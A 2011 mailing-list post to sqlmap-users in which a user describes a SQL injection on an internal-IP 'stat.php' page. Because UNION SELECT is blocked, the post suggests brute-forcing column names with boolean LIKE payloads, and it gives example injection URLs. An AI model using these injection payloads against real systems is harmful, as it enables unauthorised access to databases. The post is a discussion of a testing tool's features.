[sqlmap-users] UNION disabled
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] UNION disabled
|
From: null 0. <etc...@gm...> - 2011-09-26 15:27:43
|
Hi, I'm checking that sqlmap can't work with this injection, or maybe I can't see the correct option. Injection is like this: Original URL: http://10.0.17.252/stat.php?id=534&key=a4d80eac9ab26a4a2da04125bc2c096a Injection: http://10.0.17.252/stat.php?id=534' AND '1'='1&key=a4d80eac9ab26a4a2da04125bc2c096a The problem is that mysql user can't run UNION SELECT, so if I run sqlmap detect injection but shows nothing. Maybe is a good idea implement a bruteforce attack to retrieve columns. Example: http://10.0.17.252/stat.php?id=534' AND `name` LIKE '%&key=a4d80eac9ab26a4a2da04125bc2c096a => Shows normal page, then `name` columns exist. http://10.0.17.252/stat.php?id=534' AND `name2` LIKE '%&key=a4d80eac9ab26a4a2da04125bc2c096a => Shows "Wrong query", so this columns don't exist. I tried with --common-columns, but needs the name of the table, and we don't know this value. It's only a idea. Thanks for all. |
